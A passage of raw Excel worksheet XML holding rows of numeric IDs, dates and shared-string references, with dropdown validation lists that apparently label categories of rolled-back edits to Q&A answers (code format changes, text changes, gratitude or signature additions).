      </c>
      <c r="D754" s="9" t="s">
        <v>3968</v>
      </c>
      <c r="E754" s="9">
        <v>43089</v>
      </c>
      <c r="F754" s="9" t="s">
        <v>820</v>
      </c>
      <c r="G754" s="10">
        <v>42948.587500000001</v>
      </c>
      <c r="H754" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I754" s="9" t="s">
        <v>3969</v>
      </c>
      <c r="J754" s="10">
        <v>42948.131944444445</v>
      </c>
      <c r="K754" s="3" t="s">
        <v>786</v>
      </c>
      <c r="L754" s="6">
        <v>8</v>
      </c>
      <c r="M754" s="6">
        <v>6</v>
      </c>
      <c r="N754" s="3"/>
      <c r="O754" s="3"/>
      <c r="P754" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q754" s="3"/>
    </row>
    <row r="755" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A755" s="3">
        <v>387763</v>
      </c>
      <c r="B755" s="3" t="s">
        <v>787</v>
      </c>
      <c r="C755" s="9" t="s">
        <v>3970</v>
      </c>
      <c r="D755" s="9" t="s">
        <v>3971</v>
      </c>
      <c r="E755" s="9">
        <v>13936</v>
      </c>
      <c r="F755" s="9" t="s">
        <v>819</v>
      </c>
      <c r="G755" s="10">
        <v>42256.561111111114</v>
      </c>
      <c r="H755" s="9">
        <v>4161269</v>
      </c>
      <c r="I755" s="9" t="s">
        <v>3972</v>
      </c>
      <c r="J755" s="10">
        <v>42255.401388888888</v>
      </c>
      <c r="K755" s="3" t="s">
        <v>788</v>
      </c>
      <c r="L755" s="6">
        <v>3</v>
      </c>
      <c r="M755" s="6">
        <v>1</v>
      </c>
      <c r="N755" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O755" s="3"/>
      <c r="P755" s="3"/>
      <c r="Q755" s="3"/>
    </row>
    <row r="756" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A756" s="3">
        <v>388054</v>
      </c>
      <c r="B756" s="3" t="s">
        <v>789</v>
      </c>
      <c r="C756" s="9" t="s">
        <v>3973</v>
      </c>
      <c r="D756" s="9" t="s">
        <v>3974</v>
      </c>
      <c r="E756" s="9">
        <v>42404</v>
      </c>
      <c r="F756" s="9" t="s">
        <v>821</v>
      </c>
      <c r="G756" s="10">
        <v>39805.136805555558</v>
      </c>
      <c r="H756" s="9">
        <v>42404</v>
      </c>
      <c r="I756" s="9" t="s">
        <v>821</v>
      </c>
      <c r="J756" s="10">
        <v>39805.132638888892</v>
      </c>
      <c r="K756" s="3" t="s">
        <v>790</v>
      </c>
      <c r="L756" s="6">
        <v>3</v>
      </c>
      <c r="M756" s="6">
        <v>2</v>
      </c>
      <c r="N756" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O756" s="3"/>
      <c r="P756" s="3"/>
      <c r="Q756" s="3"/>
    </row>
    <row r="757" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A757" s="9">
        <v>388242</v>
      </c>
      <c r="B757" s="9" t="s">
        <v>1574</v>
      </c>
      <c r="C757" s="9" t="s">
        <v>3975</v>
      </c>
      <c r="D757" s="9" t="s">
        <v>3976</v>
      </c>
      <c r="E757" s="9">
        <v>16587</v>
      </c>
      <c r="F757" s="9" t="s">
        <v>1733</v>
      </c>
      <c r="G757" s="10">
        <v>41718.486805555556</v>
      </c>
      <c r="H757" s="9">
        <v>16587</v>
      </c>
      <c r="I757" s="9" t="s">
        <v>1733</v>
      </c>
      <c r="J757" s="10">
        <v>41718.48541666667</v>
      </c>
      <c r="K757" s="9" t="s">
        <v>1575</v>
      </c>
      <c r="L757" s="7">
        <v>95</v>
      </c>
      <c r="M757" s="7">
        <v>93</v>
      </c>
      <c r="N757" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="758" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A758" s="9">
        <v>438029</v>
      </c>
      <c r="B758" s="9" t="s">
        <v>1576</v>
      </c>
      <c r="C758" s="9" t="s">
        <v>3977</v>
      </c>
      <c r="D758" s="9" t="s">
        <v>3978</v>
      </c>
      <c r="E758" s="9">
        <v>10755</v>
      </c>
      <c r="F758" s="9" t="s">
        <v>3090</v>
      </c>
      <c r="G758" s="10">
        <v>39841.929166666669</v>
      </c>
      <c r="H758" s="9">
        <v>10755</v>
      </c>
      <c r="I758" s="9" t="s">
        <v>3090</v>
      </c>
      <c r="J758" s="10">
        <v>39841.929166666669</v>
      </c>
      <c r="K758" s="9" t="s">
        <v>1577</v>
      </c>
      <c r="L758" s="7">
        <v>9</v>
      </c>
      <c r="M758" s="7">
        <v>4</v>
      </c>
      <c r="O758" s="9" t="s">
        <v>705</v>
      </c>
      <c r="Q758" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="759" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A759" s="9">
        <v>438347</v>
      </c>
      <c r="B759" s="9" t="s">
        <v>1578</v>
      </c>
      <c r="C759" s="9" t="s">
        <v>3979</v>
      </c>
      <c r="D759" s="9" t="s">
        <v>3980</v>
      </c>
      <c r="E759" s="9">
        <v>54491</v>
      </c>
      <c r="F759" s="9" t="s">
        <v>3981</v>
      </c>
      <c r="G759" s="10">
        <v>39849.384722222225</v>
      </c>
      <c r="H759" s="9">
        <v>54491</v>
      </c>
      <c r="I759" s="9" t="s">
        <v>3981</v>
      </c>
      <c r="J759" s="10">
        <v>39849.384722222225</v>
      </c>
      <c r="K759" s="9" t="s">
        <v>1579</v>
      </c>
      <c r="L759" s="7">
        <v>5</v>
      </c>
      <c r="M759" s="7">
        <v>3</v>
      </c>
      <c r="N759" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="760" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A760" s="9">
        <v>439322</v>
      </c>
      <c r="B760" s="9" t="s">
        <v>1580</v>
      </c>
      <c r="C760" s="9" t="s">
        <v>3982</v>
      </c>
      <c r="D760" s="9" t="s">
        <v>3983</v>
      </c>
      <c r="E760" s="9">
        <v>377</v>
      </c>
      <c r="F760" s="9" t="s">
        <v>3984</v>
      </c>
      <c r="G760" s="10">
        <v>39826.649305555555</v>
      </c>
      <c r="H760" s="9">
        <v>377</v>
      </c>
      <c r="I760" s="9" t="s">
        <v>3984</v>
      </c>
      <c r="J760" s="10">
        <v>39826.649305555555</v>
      </c>
      <c r="K760" s="9" t="s">
        <v>1581</v>
      </c>
      <c r="L760" s="7">
        <v>3</v>
      </c>
      <c r="M760" s="7">
        <v>1</v>
      </c>
      <c r="Q760" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="761" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A761" s="9">
        <v>440474</v>
      </c>
      <c r="B761" s="9" t="s">
        <v>1582</v>
      </c>
      <c r="C761" s="9" t="s">
        <v>3985</v>
      </c>
      <c r="D761" s="9" t="s">
        <v>3986</v>
      </c>
      <c r="E761" s="9">
        <v>23354</v>
      </c>
      <c r="F761" s="9" t="s">
        <v>3987</v>
      </c>
      <c r="G761" s="10">
        <v>39826.843055555553</v>
      </c>
      <c r="H761" s="9">
        <v>23354</v>
      </c>
      <c r="I761" s="9" t="s">
        <v>3987</v>
      </c>
      <c r="J761" s="10">
        <v>39826.842361111114</v>
      </c>
      <c r="K761" s="9" t="s">
        <v>1583</v>
      </c>
      <c r="L761" s="7">
        <v>3</v>
      </c>
      <c r="M761" s="7">
        <v>1</v>
      </c>
      <c r="Q761" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="762" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A762" s="9">
        <v>441248</v>
      </c>
      <c r="B762" s="9" t="s">
        <v>1584</v>
      </c>
      <c r="C762" s="9" t="s">
        <v>3988</v>
      </c>
      <c r="D762" s="9" t="s">
        <v>3989</v>
      </c>
      <c r="E762" s="9">
        <v>2548</v>
      </c>
      <c r="F762" s="9" t="s">
        <v>801</v>
      </c>
      <c r="G762" s="10">
        <v>41148.975694444445</v>
      </c>
      <c r="H762" s="9">
        <v>1146308</v>
      </c>
      <c r="I762" s="9" t="s">
        <v>3990</v>
      </c>
      <c r="J762" s="10">
        <v>41148.768055555556</v>
      </c>
      <c r="K762" s="9" t="s">
        <v>1585</v>
      </c>
      <c r="L762" s="7">
        <v>5</v>
      </c>
      <c r="M762" s="7">
        <v>3</v>
      </c>
      <c r="N762" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="763" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A763" s="9">
        <v>441264</v>
      </c>
      <c r="B763" s="9" t="s">
        <v>1586</v>
      </c>
      <c r="C763" s="9" t="s">
        <v>3991</v>
      </c>
      <c r="D763" s="9" t="s">
        <v>3992</v>
      </c>
      <c r="E763" s="9">
        <v>47630</v>
      </c>
      <c r="F763" s="9" t="s">
        <v>3993</v>
      </c>
      <c r="G763" s="10">
        <v>39827.034722222219</v>
      </c>
      <c r="H763" s="9">
        <v>13163</v>
      </c>
      <c r="I763" s="9" t="s">
        <v>3994</v>
      </c>
      <c r="J763" s="10">
        <v>39826.980555555558</v>
      </c>
      <c r="K763" s="9" t="s">
        <v>1587</v>
      </c>
      <c r="L763" s="7">
        <v>4</v>
      </c>
      <c r="M763" s="7">
        <v>2</v>
      </c>
      <c r="Q763" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="764" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A764" s="9">
        <v>441302</v>
      </c>
      <c r="B764" s="9" t="s">
        <v>1588</v>
      </c>
      <c r="C764" s="9" t="s">
        <v>3995</v>
      </c>
      <c r="D764" s="9" t="s">
        <v>3996</v>
      </c>
      <c r="E764" s="9">
        <v>115</v>
      </c>
      <c r="F764" s="9" t="s">
        <v>3997</v>
      </c>
      <c r="G764" s="10">
        <v>39826.979166666664</v>
      </c>
      <c r="H764" s="9">
        <v>115</v>
      </c>
      <c r="I764" s="9" t="s">
        <v>3997</v>
      </c>
      <c r="J764" s="10">
        <v>39826.979166666664</v>
      </c>
      <c r="K764" s="9" t="s">
        <v>1589</v>
      </c>
      <c r="L764" s="7">
        <v>4</v>
      </c>
      <c r="M764" s="7">
        <v>2</v>
      </c>
      <c r="N764" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="765" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A765" s="9">
        <v>441684</v>
      </c>
      <c r="B765" s="9" t="s">
        <v>1590</v>
      </c>
      <c r="C765" s="9" t="s">
        <v>3998</v>
      </c>
      <c r="D765" s="9" t="s">
        <v>3999</v>
      </c>
      <c r="E765" s="9">
        <v>16587</v>
      </c>
      <c r="F765" s="9" t="s">
        <v>1733</v>
      </c>
      <c r="G765" s="10">
        <v>39867.665972222225</v>
      </c>
      <c r="H765" s="9">
        <v>30576</v>
      </c>
      <c r="I765" s="9" t="s">
        <v>4000</v>
      </c>
      <c r="J765" s="10">
        <v>39827.122916666667</v>
      </c>
      <c r="K765" s="9" t="s">
        <v>1591</v>
      </c>
      <c r="L765" s="7">
        <v>4</v>
      </c>
      <c r="M765" s="7">
        <v>2</v>
      </c>
      <c r="N765" s="9" t="s">
        <v>696</v>
      </c>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:Q778">
    <sortCondition ref="A2:A778"/>
  </sortState>
  <dataValidations count="7">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="P728 P430 P459 P504 P537 P545 P561 P592:P595 P638 P660:P682 P707 O725:O755 O757:O765 N3:O388 O389:O723 N389:N765" xr:uid="{00000000-0002-0000-0000-000000000000}">
      <formula1>"Undesired Code Format,Incorrect Code Change,Undesired Code Add,Undesired Code Removal,Undesired Text Formatting,Incorret Text Change,Undesired Text Addition,Undesired Text Remove,Undesired Text Change,Part Accept,Emotion Add,Emotion Remove,Other,Ref Mod"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="Q40:Q327 Q329:Q388" xr:uid="{79773F9B-E279-4A58-95D8-456F4B3BD62C}">
      <formula1>"Status add/remove, Signature add/remove,Gratitude Add/Remove"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="Q328 Q3:Q39" xr:uid="{CDD54C0C-E01E-4354-A475-E60A61AE7204}">
      <formula1>"Status add/remove, Signature add/remove,Gratitude Add/Remove,Deprecation Note,Greetings Add/Remove"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="P389:P429 P729:P765 P460:P503 P505:P536 P562:P591 P596:P637 P454:P458 P708:P727 P431:P452 P538:P544 P546:P560 P639:P659 P683:P705" xr:uid="{DD70CEB4-D1C5-4ED3-9157-744F758A58A8}">
      <formula1>"Undesired Code Format,Incorrect Code Change,Undesired Code Add,Undesired Code Removal,Undesired Text Formatting,Incorret Text Change,Undesired Text Addition,Undesired Text Remove,Undesired Text Change,Emotion Add,Emotion Remove,Gratitude Add/Remove"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="Q434" xr:uid="{F46A3533-58B6-47AA-A725-DF1BF2492FE8}">
      <formula1>"Emotion Add/Remove, Signature add/remove"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="Q389:Q433 O724 P453 P706 O756 Q435:Q765" xr:uid="{A2154555-4D28-45E6-A3DE-AE51B50A48F9}">
      <formula1>"Status add/remove, Signature add/remove,Undesired Code Change,Gratitude Add/Remove,Duplication Note,Greetings Add/Remove"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="P3:P388" xr:uid="{AAFE10E9-B49F-47FF-A788-10E94A9A12FB}">
      <formula1>"UD Code Format,Inc Code Change,UD Code Add/Removal,UD code change,Undesired Text Formatting,Incorret Text Change,Undesired Text Addition,Undesired Text Remove,Undesired Text Change,Part Accept,Emotion Add,Emotion Remove,Other,Ref Mod"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SampledAnswerRollBack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Saikat Mondal</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-19T02:25:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-01T10:10:04Z</dcterms:modified>
</cp:coreProperties>
</file>